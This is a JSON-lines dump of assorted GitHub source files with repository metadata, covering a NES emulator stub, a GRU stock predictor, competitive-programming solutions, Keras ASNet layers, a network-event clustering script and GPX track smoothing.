name=\"word_update\"),\n path(\"/create//\", WordCreate.as_view(), name=\"word_create\"),\n path(\"/delete/\", WordDelete.as_view(), name=\"word_delete\"),\n]\n","repo_name":"Gamattowicz/Flashcard","sub_path":"words/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73122030953","text":"import numpy as np\n\nfrom cpu import opcodes\nfrom cpu import addr_modes\n\nclass cpu:\n\t\n\t# construtor\n\tdef __init__(self):\n\n\t\t# registers\n\t\tself.acc = 0x00\n\t\tself.x = 0x00\n\t\tself.y = 0x00\n\t\tself.pc = 0x0000\n\t\tself.stack_pointer = 0x00\n\n\t\tself.ram = [0] * 0xFFFF\n\t\tself.addr_abs = 0x00\n\t\tself.addr_rel = 0x00\n\t\t\n\t\t\t\n\t\t# status flags\n\t\tself.flags = {\n\t\t\t\"C\": False,\n\t\t\t\"Z\": False,\n\t\t\t\"I\": False,\n\t\t\t\"D\": False,\n\t\t\t\"B\": False,\n\t\t\t\"V\": False,\n\t\t\t\"N\": False\n\t\t}\n\t\tself.opcode = opcodes.opcodes()\n\n\t# addressing modes\n\t\n\n\tdef check_op(self, i):\n\t\tif i == 0x00:\n\t\t\tprint('caiu no break')\n\t\telif i == 0x78:\n\t\t\tself.opcode.SEI(self)\n\t\telse:\n\t\t\tprint('unexpected opcode')\n\t\n\tdef read(self, addr):\n\t\tif addr < 0x0000 or addr > 0xFFFF:\n\t\t\tprint('addr out of bounds')\n\t\telse:\n\t\t\treturn self.ram[addr]\n\n\tdef write(self, addr, data):\n\t\tif addr < 0x0000 or addr > 0xFFFF:\n\t\t\tprint('addr out of bounds')\n\t\telse:\n\t\t\tself.ram[addr] = data\n\n\t","repo_name":"Loernius/nespyemu","sub_path":"cpu/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7431239793","text":"import numpy\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport tensorflow as tf\r\nfrom keras import Sequential\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix,\\\r\n classification_report, max_error, mean_absolute_error, mean_squared_error\r\nfrom keras.layers import LSTM, Dense, RNN, GRU, Dropout\r\nfrom keras.optimizers import SGD, Adam\r\nimport math\r\nfrom sklearn.metrics import mean_squared_error\r\nimport datetime\r\nimport tensorboard\r\nimport pickle\r\ntensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=\"./GRUlogsCLassification\")\r\ndf = pd.read_csv(\"DataFrame.csv\")\r\ndf = df.drop(\"Type\", axis=1)\r\ndf[\"Time\"] = pd.to_datetime(df['Time'])\r\n\r\ndf1 = df.reset_index()['close']\r\nprint(df1.describe)\r\n\r\n\r\nscalar = MinMaxScaler(feature_range=(0, 1))\r\ndf1 = scalar.fit_transform(np.array(df1).reshape(-1, 1))\r\ntraining_size=int(len(df1)*0.85)\r\ntest_size = len(df1)-training_size\r\ntrain_data, test_data = df1[0:training_size, :], df1[training_size:len(df1), :1]\r\n\r\nprint(training_size, test_size)\r\n\r\n\r\ndef create_dataset(dataset, time_step=100):\r\n dataX, dataY = [], []\r\n for i in range(len(dataset)-time_step-1):\r\n a = dataset[i:(i+time_step), 0]\r\n dataX.append(a)\r\n dataY.append(dataset[i + time_step, 0])\r\n return numpy.array(dataX), numpy.array(dataY)\r\n\r\n\r\ntime_step = 100\r\nX_train, y_train = create_dataset(train_data, time_step)\r\nX_test, ytest = create_dataset(test_data, time_step)\r\n\r\nX_train = X_train.reshape(X_train.shape[0], X_train.shape[1], 1)\r\nX_test = X_test.reshape(X_test.shape[0], X_test.shape[1], 1)\r\nregressorGRU = Sequential()\r\n# First GRU layer with Dropout regularisation\r\nregressorGRU.add(GRU(units=50, return_sequences=True, input_shape=(X_train.shape[1], 1), activation='tanh'))\r\nregressorGRU.add(Dropout(0.3))\r\n# Second GRU layer\r\nregressorGRU.add(GRU(units=50, return_sequences=True, input_shape=(X_train.shape[1], 1), activation='relu'))\r\nregressorGRU.add(Dropout(0.3))\r\n# Third GRU layer\r\nregressorGRU.add(GRU(units=64, activation='tanh'))\r\nregressorGRU.add(Dropout(0.2))\r\n# The output layer\r\nregressorGRU.add(Dense(units=1))\r\n\r\nregressorGRU.compile(optimizer=Adam(), loss='mean_absolute_error')\r\n\r\n# fitting the model\r\n\r\nregressorGRU.fit(X_train, y_train, epochs=80, batch_size=10, validation_split=0.15, callbacks=[tensorboard_callback])\r\n\r\n\r\npredicted_with_gru = regressorGRU.predict(X_test)\r\npredicted_with_gru = scalar.inverse_transform(predicted_with_gru)\r\n# regressorGRU.save(\"GRUCLASS.h5\")\r\n\r\n\r\ndef plot_predictions(test, predicted):\r\n plt.plot(test, color=\"red\", label=\"realstock price\")\r\n plt.plot(predicted, color=\"blue\", label=\"predicted stock price\")\r\n plt.title(\"stock price prediction\")\r\n plt.xlabel(\"time\")\r\n plt.ylabel(\"stock price\")\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef return_rmse(test, predicted):\r\n rmse = math.sqrt(mean_squared_error(test, predicted))\r\n print(\"the root mean squared error is : {}.\".format(rmse))\r\n\r\n\r\ntrain_predict = regressorGRU.predict(X_train)\r\ntest_predict = regressorGRU.predict(X_test)\r\n\r\ntrain_predict = scalar.inverse_transform(train_predict)\r\ntest_predict = scalar.inverse_transform(test_predict)\r\nmath.sqrt(mean_squared_error(y_train, train_predict))\r\nmath.sqrt(mean_squared_error(ytest, test_predict))\r\n\r\nplot_predictions(ytest, predicted_with_gru)\r\n\r\nreturn_rmse(ytest, predicted_with_gru)\r\n# shift train predictions for plotting\r\nlook_back=100\r\ntrainPredictPlot = numpy.empty_like(df1)\r\ntrainPredictPlot[:, :] = np.nan\r\ntrainPredictPlot[look_back:len(train_predict)+look_back, :] = train_predict\r\n# shift test predictions for plotting\r\ntestPredictPlot = numpy.empty_like(df1)\r\ntestPredictPlot[:, :] = numpy.nan\r\ntestPredictPlot[len(train_predict)+(look_back*2)+1:len(df1)-1, :] = test_predict\r\n# plot baseline and predictions\r\nplt.plot(scalar.inverse_transform(df1))\r\nplt.plot(trainPredictPlot)\r\nplt.plot(testPredictPlot)\r\nplt.show()\r\n","repo_name":"Sanskar1404/Major-project-technocolabs","sub_path":"GRU.py","file_name":"GRU.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30686666395","text":"#마법사 상어와 토네이도\n\n#모래 계산하는 함수\ndef solve(time, dx, dy, direction):\n global answer, s_x, s_y\n\n # y좌표 계산 & x좌표 갱신\n for _ in range(time):\n s_x += dx\n s_y += dy\n if s_y < 0: #범위 밖에면 stop\n break\n\n # out_sand 구하기\n total = 0\n for x, y, z in direction:\n nx = s_x + x\n ny = s_y + y\n\n if z == 0:\n new_sand = sand[s_x][s_y] - total\n else:\n new_sand = int(sand[s_x][s_y] * z)\n total += new_sand\n\n if 0 <= nx < n and 0 <= ny < n:\n sand[nx][ny] += new_sand\n else:\n answer += new_sand\n\n\n\nimport sys\nn = int(sys.stdin.readline().rstrip())\nsand = [list(map(int, sys.stdin.readline().rstrip().split())) for _ in range(n)]\n\nleft = [(1, 1, 0.01), (-1, 1, 0.01), (1, 0, 0.07), (-1, 0, 0.07), (1, -1, 0.1),\n (-1, -1, 0.1), (2, 0, 0.02), (-2, 0, 0.02), (0, -2, 0.05), (0, -1, 0)]\nright = [(x, -y, z) for x, y, z in left]\ndown = [(-y, x, z) for x, y, z in left]\nup = [(y, x, z) for x, y, z in left]\n\ns_x, s_y = n // 2, n // 2\nanswer = 0\n\nfor i in range(1, n + 1):\n if i % 2:\n solve(i, 0, -1, left)\n solve(i, 1, 0, down)\n else:\n solve(i, 0, 1, right)\n solve(i, -1, 0, up)\nprint(answer)","repo_name":"jisuuuu/Algorithm_Study","sub_path":"Baekjoon/Baekjoon_python/boj_20057.py","file_name":"boj_20057.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23774558161","text":"'''\n1306. Jump Game III\nMedium\n\nGiven an array of non-negative integers arr, you are initially positioned at start index of the array. When you are at index i, you can jump to i + arr[i] or i - arr[i], check if you can reach to any index with value 0.\n\nNotice that you can not jump outside of the array at any time.\n\n \n\nExample 1:\n\nInput: arr = [4,2,3,0,3,1,2], start = 5\nOutput: true\nExplanation: \nAll possible ways to reach at index 3 with value 0 are: \nindex 5 -> index 4 -> index 1 -> index 3 \nindex 5 -> index 6 -> index 4 -> index 1 -> index 3 \n\nExample 2:\n\nInput: arr = [4,2,3,0,3,1,2], start = 0\nOutput: true \nExplanation: \nOne possible way to reach at index 3 with value 0 is: \nindex 0 -> index 4 -> index 1 -> index 3\n\nExample 3:\n\nInput: arr = [3,0,2,1,2], start = 2\nOutput: false\nExplanation: There is no way to reach at index 1 with value 0.\n\n \n\nConstraints:\n\n 1 <= arr.length <= 5 * 104\n 0 <= arr[i] < arr.length\n 0 <= start < arr.length\n\nAccepted\n109,035\nSubmissions\n174,809\n'''\n# O(n) time, O(n) space\nclass Solution:\n def canReach(self, arr: [int], start: int) -> bool:\n self.visited = set()\n def helper(i):\n if i >= len(arr) or i < 0: return False\n if i in self.visited: return False\n self.visited.add(i)\n if arr[i] == 0:\n return True\n return helper(i+arr[i]) or helper(i-arr[i])\n return helper(start)\n\n# O(n) time, O(1) space(not counting recursive stack) dfs\nclass Solution:\n def canReach(self, arr: [int], start: int) -> bool:\n if start < 0 or start >= len(arr) or arr[start] < 0:\n return False\n arr[start] *= -1\n return arr[start] == 0 or self.canReach(arr, start + arr[start]) or self.canReach(arr, start - arr[start])\n\n# O(n) time, O(n) space, bfs\nfrom collections import deque\nclass Solution:\n def canReach(self, arr: [int], start: int) -> bool:\n q = deque([start])\n while q:\n cur = q.popleft()\n if arr[curr] == 0: return True\n if arr[curr] < 0: continue\n if curr + arr[curr] < len(arr):\n q.append(curr+arr[curr])\n if curr - arr[curr] >= 0:\n q.append(curr-arr[curr])\n arr[curr] *= -1\n return False\n\narr = [4,2,3,0,3,1,2]\nstart = 5\n# Output: true\n\n# arr = [4,2,3,0,3,1,2]\n# start = 0\n# # Output: true \n\n# arr = [3,0,2,1,2]\n# start = 2\n# Output: false\n\nsol = Solution()\nprint(sol.canReach(arr, start))\n","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2021/12. December 2021/9.canReach.py","file_name":"9.canReach.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11657609090","text":"import json\r\n\r\n# Load the data from the large file\r\nwith open('../news_links_vietnambiz.json', 'r', encoding='utf-8') as f:\r\n data = json.load(f)\r\n\r\n# Find the midpoint of the data\r\nmidpoint = len(data) // 2\r\n\r\n# Split the data into two halves\r\ndata1 = data[:midpoint]\r\ndata2 = data[midpoint:]\r\n\r\n# Write the first half of the data to a new file\r\nwith open('../news_links_vietnambiz_1.json', 'w', encoding='utf-8') as f:\r\n json.dump(data1, f, ensure_ascii=False, indent=4)\r\n\r\n# Write the second half of the data to another new file\r\nwith open('../news_links_vietnambiz_2.json', 'w', encoding='utf-8') as f:\r\n json.dump(data2, f, ensure_ascii=False, indent=4)\r\n","repo_name":"Karej/News_classification","sub_path":"utils/split_json.py","file_name":"split_json.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25481984460","text":"import re\n\nfrom keras import backend as K\n\nfrom keras import activations\nfrom keras import initializers\nfrom keras import regularizers\n\nfrom keras.engine.topology import Layer\nfrom keras.layers import concatenate, GlobalMaxPooling1D, Dropout\n\n\nclass PropositionInputLayer(Layer):\n \"\"\"\n custom keras layer to compute the input for a ASNet proposition module\n \"\"\"\n\n def __init__(self,\n hidden_representation_size,\n proposition,\n related_propositional_action_ids,\n **kwargs):\n \"\"\"\n :param hidden_representation_size: hidden representation size used by every\n module (= size of module outputs)\n :param proposition: propostion the input model is built for\n :param related_propositional_action_ids: list of nested lists\n each nested list corresponds to one action schema related to the underlying predicate\n of proposition. All these actions whose ids are in the nested list are related to proposition\n \"\"\"\n self.hidden_representation_size = hidden_representation_size\n self.proposition = proposition\n self.related_propositional_action_ids = related_propositional_action_ids\n super(PropositionInputLayer, self).__init__(**kwargs)\n\n\n def build(self, input_shape):\n super(PropositionInputLayer, self).build(input_shape)\n\n\n def call(self, inputs):\n \"\"\"\n :param inputs: concatenation of all action module outputs of the last action layer\n :return: concatenation of the outputs of the related actions\n Thereby, actions with the same unterlying action schema (grouped in one nested list\n in related_action_ids) are pooled together. If there are no such actions for one\n nested list, then use a zero tensor of the necessary size\n \"\"\"\n # collect outputs of related action modules in last layer and pool all outputs together of\n # action modules of the same underlying action schema\n pooled_related_outputs = []\n for action_schema_list in self.related_propositional_action_ids:\n # collect outputs of all actions in the nested action_schema_list\n action_schema_outputs = []\n for index in action_schema_list:\n action_schema_outputs.append(inputs[:, self.hidden_representation_size * index: self.hidden_representation_size * (index + 1)])\n # concatenate outputs\n if not action_schema_outputs:\n # There were no related propositional actions of the corresponding action schema\n # -> create hidden-representation-sized vector of 0s\n # inputs.shape[0] matches batch_size\n shape_like_tensor = inputs[:, 0: self.hidden_representation_size]\n zeros = K.zeros_like(shape_like_tensor)\n pooled_related_outputs.append(zeros)\n else:\n if len(action_schema_outputs) > 1:\n concat_tensors = []\n for tensor in action_schema_outputs:\n # expand tensor dim for global max pooling afterwards (shrinks second dimension)\n concat_tensors.append(K.expand_dims(tensor, 1))\n # concatenate those expanded tensors along the second axis (\"besides\" for pooling these together)\n concatenated_output = concatenate(concat_tensors, 1)\n # apply global max pooling\n pooled_output = GlobalMaxPooling1D()(concatenated_output)\n pooled_related_outputs.append(pooled_output)\n else:\n # there is only one action of the action schema outputs\n pooled_related_outputs.append(action_schema_outputs[0])\n\n # concatenate all pooled related output tensors to new input tensor for module\n if len(pooled_related_outputs) > 1:\n layer_name = \"prop_input_final_concat_\" + re.sub(r\"\\W+\", \"\", self.proposition.__str__())\n return concatenate(pooled_related_outputs, name=layer_name)\n else:\n return pooled_related_outputs[0]\n\n\n def compute_output_shape(self, input_shape):\n assert len(input_shape) == 2\n return (input_shape[0], len(self.related_propositional_action_ids) * self.hidden_representation_size)\n\n\nclass PropositionModuleLayer(Layer):\n \"\"\"\n custom keras layer to implement ASNet proposition module\n \"\"\"\n\n def __init__(self,\n hidden_representation_size,\n activation,\n dropout,\n kernel_initializer,\n bias_initializer,\n regularizer_value,\n **kwargs):\n \"\"\"\n :param hidden_representation_size: hidden representation size used by every\n module (= size of module outputs)\n :param activation: name of activation function to be used in all modules\n of all layers but the last output layer\n :param dropout rate used in every intermediate node\n :param kernel_initializer: initializer to be used for all weight matrices/ kernels\n of all modules\n :param bias_initializer: initializer to be used for all bias vectors\n of all modules\n :param regularizer_value: value used for all L2 regularizations applied\n to all weights (-matrices and bias vectors!)\n \"\"\"\n self.hidden_representation_size = hidden_representation_size\n self.activation = activations.get(activation)\n self.dropout = dropout\n self.kernel_initializer = initializers.get(kernel_initializer)\n self.bias_initializer = initializers.get(bias_initializer)\n self.regularizer_value = regularizer_value\n super(PropositionModuleLayer, self).__init__(**kwargs)\n\n\n def build(self, input_shape):\n self.kernel = self.add_weight(name='kernel', \n shape=(input_shape[1], self.hidden_representation_size),\n initializer=self.kernel_initializer,\n regularizer=regularizers.l2(self.regularizer_value),\n trainable=True)\n self.bias = self.add_weight(name='bias',\n shape=(self.hidden_representation_size,),\n initializer=self.bias_initializer,\n regularizer=regularizers.l2(self.regularizer_value),\n trainable=True)\n super(PropositionModuleLayer, self).build(input_shape)\n\n\n def call(self, inputs):\n output = K.dot(inputs, self.kernel)\n output = K.bias_add(output, self.bias)\n output = self.activation(output)\n if self.dropout:\n return Dropout(self.dropout)(output)\n return output\n\n\n def compute_output_shape(self, input_shape):\n assert len(input_shape) == 2\n return (input_shape[0], self.hidden_representation_size)","repo_name":"LukasSchaefer/ASNets_FastDownward","sub_path":"network_models/asnets/custom_keras_layers/proposition_module_layer.py","file_name":"proposition_module_layer.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4112796800","text":"import requests\r\nimport pandas as pd\r\n\r\n# your_class = input(\"input your class:\")\r\nyour_class = 920611\r\nurl = f\"https://iis.bsuir.by/api/v1/schedule?studentGroup={your_class}\"\r\n\r\n\r\nres = requests.get(url)\r\nschedules = res.json()[\"schedules\"]\r\ntimetable = []\r\nfor week in schedules:\r\n weekday = week[\"weekDay\"]\r\n for schedule in week[\"schedule\"]:\r\n auditory = schedule[\"auditory\"][0]\r\n name = schedule[\"employee\"][0][\"firstName\"] + ' ' + \\\r\n schedule[\"employee\"][0][\"middleName\"] + ' ' + schedule[\"employee\"][0][\"lastName\"]\r\n lessonTime = schedule[\"lessonTime\"]\r\n lessonType = schedule[\"lessonType\"]\r\n weekNumber = schedule[\"weekNumber\"]\r\n subject = schedule[\"subject\"]\r\n subjectFullName = schedule[\"subjectFullName\"]\r\n timetable.append({\"auditory\": auditory,\r\n \"name\": name,\r\n \"lessonTime\": lessonTime,\r\n \"lessonType\": lessonType,\r\n \"weekday\": weekday,\r\n \"weekNumber\": weekNumber,\r\n \"subject\": subject,\r\n \"subjectFullName\": subjectFullName})\r\ndf = pd.DataFrame(timetable)\r\ndf.to_json(\"a.csv\")\r\nprint(df)\r\nres.close()\r\n","repo_name":"Jason4019/timetable","sub_path":"timetable/timetable.py","file_name":"timetable.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21475339749","text":"class Solution:\n def minAreaFreeRect(self, points: List[List[int]]) -> float:\n \n def calDis(p1, p2):\n return (p1[0]-p2[0])**2.0 + (p1[1]-p2[1])**2.0\n \n ans = math.inf\n check = set()\n for point in points:\n check.add(str(point))\n \n for a in points:\n for b in points:\n if a == b: continue\n for c in points:\n if a == c or b == c: continue\n if calDis(a,b) + calDis(b,c) == calDis(a,c):\n d = [a[0] + c[0] - b[0], a[1] + c[1] - b[1]]\n if str(d) in check:\n ans = min(ans, math.sqrt(calDis(a,b)) * math.sqrt(calDis(b,c)))\n if ans == math.inf:\n return 0\n else:\n return ans\n \n","repo_name":"notruilin/LeetCode","sub_path":"963. Minimum Area Rectangle II/minAreaFreeRect.py","file_name":"minAreaFreeRect.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34623868758","text":"import math\nimport os\n\n\ndef clear():\n if os.name == 'nt':\n os.system('cls') # Windows Console Command\n else:\n os.system('clear') # Unix-like Console Command\n\n\ndef print_menu():\n clear()\n print('Conversion Menu')\n print('#' * 40)\n print('1. Meter to Mile')\n print('2. Gram to Pound')\n print('3. Celsius to Fahrenheit')\n print('4. Degree to Radian')\n print('q. 종료')\n print('#' * 40)\n\n\ndef meter_to_mile():\n clear()\n print('Meter to Mile Conversion')\n print('#' * 40)\n meter = input('meter: ')\n print(f'{meter} meter >> {float(meter) / 1609} mile')\n input('press enter to exit')\n\n\ndef gram_to_pound():\n clear()\n print('Gram to Pound Conversion')\n print('#' * 40)\n gram = input('gram: ')\n print(f'{gram} gram >> {float(gram) / 453.6} pound')\n input('press enter to exit')\n\n\ndef celsius_to_fahrenheit():\n clear()\n print('Celsius to Fahrenheit Conversion')\n print('#' * 40)\n celsius = input('celsius: ')\n print(f'{celsius} celsius >> {float(celsius) * (9 / 5) + 32} fahrenheit')\n input('press enter to exit')\n\n\ndef degree_to_radian():\n clear()\n print('Degree to Radian Conversion')\n print('#' * 40)\n degree = input('degree: ')\n print(f'{degree} degree >> {float(degree) * (math.pi / 180)} radian')\n input('press enter to exit')\n\n\ndef main():\n while True:\n print_menu()\n menu = input('i: ')\n if menu == '1':\n meter_to_mile()\n elif menu == '2':\n gram_to_pound()\n elif menu == '3':\n celsius_to_fahrenheit()\n elif menu == '4':\n degree_to_radian()\n elif menu == 'q':\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NULL0xFF/2022-python-basic","sub_path":"week02/mini_project.py","file_name":"mini_project.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34712361775","text":"#WRITE YOUR CODE IN THIS FILE\r\n#define function\r\n#add parameters\r\ndef close10(x, y):\r\n#if then else\r\n if abs(x - 10) > abs(y - 10):\r\n return y\r\n elif abs(x - 10) < abs(y - 10):\r\n return x\r\n else:\r\n return 0\r\n#run function\r\nprint(close10(13, -13))","repo_name":"Introduction-to-Programming-OSOWSKI/2-4-closer-to-10-Madison-Skogsberg-2023","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74594360872","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plt\nimport csv\nimport sys\n'''\n ./plot_mount.py input\n'''\n\nfile_arr = ['10,10', '50,50','100,100', '1000,1000']\nmount = 'mount'\nX = [1, 2, 3, 4]\nx = []\ny = []\nfor num in file_arr:\n temp = []\n f = mount+num\n inf = open(f, 'r')\n lines = inf.readlines()\n for line in lines:\n temp.append(float(line.split()[1][2:-1]))\n x.append(num)\n y.append(sum(temp)/len(temp))\n\nplt.bar(X, y,width=0.2,label='vanilla',edgecolor='black')\nplt.legend()\nplt.xticks(X, x)\nplt.title('mount time comparison')\nplt.xlabel('partition size')\nplt.ylabel('time(s)')\nplt.show()\n","repo_name":"JackChuang/LinuxKernelProgramming","sub_path":"p6/prototype-parallel/user/plot_mount.py","file_name":"plot_mount.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14154456417","text":"import numpy as np\nimport pandas as pd\nimport datetime\nfrom utils import *\n\nfrom preprocess import *\nimport nerd\n\nfrom scipy.spatial.distance import squareform, pdist\n\nimport TemporalClusterer\n\n#import umap\nimport hdbscan\nimport dCollector\n\n\nif __name__ == '__main__':\n\n # Load preprocessed files\n days = int(sys.argv[4])\n intervals = list(pd.date_range(sys.argv[2], sys.argv[3]))\n for idx in range(0, len(intervals), days):\n print(f\"Processing files for {intervals[idx].date().isoformat()} - {intervals[idx+days-1].date().isoformat()}\")\n (df, file_list) = load_files(sys.argv[1], intervals[idx].date().isoformat(), intervals[idx+days-1].date().isoformat())\n\n print(\"Clustering\")\n tc = TemporalClusterer.TemporalClusterer(min_events=sys.argv[5], max_activity=sys.argv[6],\n dist_threshold=sys.argv[7])\n df['labels'] = tc.fit_transform(df, [])\n\n print(\"Running post process\")\n (clusters, series, score) = tc.post_process(df, file_list, query_nerd=True)\n\n # Ranking of clusters, to pick what to focus on\n top10 = clusters.sort_values(by=['score', 'size'], ascending=False).head(10)\n\n intervals = sample_intervals(series, file_list[0], tc.aggregation) # tc.aggregations should be same as\n # with series\n\n # only if you want flows and more data\n df_flows = pd.Series(dtype=object)\n df_nerd = pd.DataFrame()\n\n if sys.argv[8] == 'True':\n df_flows = clusters_get_flows(top10['ips'], intervals.loc[top10.index])\n\n df_ip = df.loc[df['labels'] > -1, ['ip', 'labels']].loc[df['labels'] > -1]\n df_ip = df_ip.groupby('ip').agg(cluster=('labels', min))\n nerdC = nerd.NerdC()\n df_nerd = nerdC.ip_req(df_ip.index.values)\n\n df_nerd['cluster'] = df_ip\n del df_ip\n\n df_flow_views = flows_get_views(df_flows)\n\n store_analysis(f'./data/{file_list[0]}_{file_list[-1]}/', df.loc[df['labels']>-1, :], clusters, series,\n df_nerd, df_flows, df_flow_views[0], df_flow_views[1])\n\n","repo_name":"CESNET/SECT","sub_path":"DistTemporalClusterer.py","file_name":"DistTemporalClusterer.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31100081738","text":"# 숨바꼭질 2\n# 너비 우선 탐색\n\nfrom collections import deque\nN,K = map(int,input().split())\nworld = [0]*100001\nworld[N] = 1\nminimum = 0\nans = 0\nqueue = deque([[N,0]])\nwhile len(queue) :\n pos,time = queue.popleft()\n world[pos] = 1\n if minimum and pos == K and minimum == time :\n # 답이 한번 더 나왔으므로, 답 개수에 추가\n ans += 1\n if not minimum and pos == K :\n # 첫 답\n ans += 1\n minimum = time\n if pos-1 > -1 and world[pos-1] == 0:\n queue.append([pos-1,time+1])\n if pos*2 < 100001 and world[pos*2] == 0:\n # 순간이동\n queue.append([pos*2,time+1])\n if pos+1 < 100001 and world[pos+1] == 0:\n queue.append([pos+1,time+1])\nprint(minimum)\nprint(ans)","repo_name":"halionaz/Algorithm","sub_path":"baekjoon/12851.py","file_name":"12851.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"15252705497","text":"import re\nimport fileinput\nimport sys\nimport tempfile\nimport time\nimport multiprocessing as mp\nfrom gpxpy import geo as mod_geo\nfrom . import functions\nfrom datetime import datetime\nimport copy\n\ndef getgpxstring(filename,algo=2):\n with open(filename, 'r') as f:\n gpx_file_data=f.read()\n return gpx_file_data\n\ndef smoothengpxfilename(filename, algo=2) :\n with open(filename, 'r') as f:\n gpxdata=f.read()\n gpxdata_smooth,lat,lon,ele,latsmooth,lonsmooth,elesmooth = smoothengpx(gpxdata,algo)\n return gpxdata_smooth,lat,lon,ele,latsmooth,lonsmooth,elesmooth\n\ndef smoothengpx(gpx_file_smooth_data, algo, return_dict=None) :\n \n infile = tempfile.NamedTemporaryFile('w',1)\n infile.write(gpx_file_smooth_data)\n tempfilename = infile.name\n\n tempf = open(tempfilename, 'r')\n temp = tempf.read()\n\n lat,lon,ele,times = functions.getarraysfile(gpx_file_smooth_data)\n\n latsmooth = list(lat)\n lonsmooth = list(lon)\n elesmooth = list(ele)\n \n # this is the smoothening algorithm\n nsection=7\n for sectionstart in range(0,len(lon)-1-nsection):\n centslice = int(sectionstart+(nsection-1)/2)\n lonslice = lon[sectionstart:sectionstart+nsection]\n latslice = lat[sectionstart:sectionstart+nsection]\n eleslice = ele[sectionstart:sectionstart+nsection]\n timesslice = times[sectionstart:sectionstart+nsection]\n\n if int(algo) == 0 :\n import numpy as np\n z = np.polyfit(lonslice,latslice,1)\n p = np.poly1d(z)\n xp = np.linspace(lonslice[0],lonslice[nsection-1], nsection)\n stepsize = (lonslice[nsection-1]-lonslice[0])/100\n dmin=1000;\n for i in range(1,100):\n d = mod_geo.distance(lonslice[0]+stepsize*i,p(lonslice[0]+stepsize*i),None,lonslice[(nsection-1)/2],latslice[(nsection-1)/2],None)\n if d < dmin:\n dmin = d\n lonsmooth[centslice] = lonslice[0]+stepsize*i\n latsmooth[centslice] = p(lonslice[0]+stepsize*i)\n\n if int(algo) == 1 :\n lonsmooth[centslice] = sum(lonslice)/len(lonslice)\n latsmooth[centslice] = sum(latslice)/len(latslice)\n elesmooth[centslice] = sum(eleslice)/len(eleslice)\n \n # time limit on point average\n if int(algo) == 2 :\n midstamp = datetime.strptime(timesslice[int((nsection-1)/2)], \"%Y-%m-%dT%H:%M:%SZ\")\n i=-1\n while i < len(latslice)-1 :\n i = i+1\n thisstamp = datetime.strptime(timesslice[i], \"%Y-%m-%dT%H:%M:%SZ\")\n delta = thisstamp - midstamp\n delta = abs(delta)\n if delta.seconds > 6 :\n latslice = latslice[:i] + latslice[i+1 :]\n lonslice = lonslice[:i] + lonslice[i+1 :]\n eleslice = eleslice[:i] + eleslice[i+1 :]\n timesslice = timesslice[:i] + timesslice[i+1 :]\n i = i-1\n\n lonsmooth[centslice] = sum(lonslice)/len(lonslice)\n latsmooth[centslice] = sum(latslice)/len(latslice)\n elesmooth[centslice] = sum(eleslice)/len(eleslice)\n\n\n distance=0\n pos=0\n i=-1\n while i < len(lat)-1 :\n i = i + 1\n tempf.seek(pos)\n line = tempf.readline()\n pos = tempf.tell()\n line = line + tempf.readline()\n linevalues = re.findall(\"\\d+\\.\\d+\",line)\n if(len(linevalues)==3):\n thislat = float(linevalues[0])\n thislon = float(linevalues[1])\n\n newline = ' \\n {2:.1f}\\n'.format(latsmooth[i],lonsmooth[i],elesmooth[i])\n gpx_file_smooth_data = gpx_file_smooth_data.replace(line,newline)\n\n else :\n i = i -1\n\n\n # print(line,thislat,thislon)\n \n # if thislat == lat[i]:\n # if thislon == lon[i]:\n # if i > 0 :\n # distance = distance + mod_geo.distance(latsmooth[i],lonsmooth[i],elesmooth[i],latsmooth[i-1],lonsmooth[i-1],elesmooth[i-1])\n \n # newline = ' \\n {2:.1f}\\n'.format(latsmooth[i],lonsmooth[i],elesmooth[i])\n # #newline = ' \\n {2:.1f}\\n \\n {3:.2f}\\n \\n'.format(latsmooth[i],lonsmooth[i],elesmooth[i],distance)\n # gpx_file_smooth_data = gpx_file_smooth_data.replace(line,newline)\n # break\n\n if return_dict == None :\n return gpx_file_smooth_data,lat,lon,ele,latsmooth,lonsmooth,elesmooth\n\n return_dict[0] = gpx_file_smooth_data\n return_dict[1] = lat\n return_dict[2] = lon\n return_dict[3] = ele\n return_dict[4] = latsmooth\n 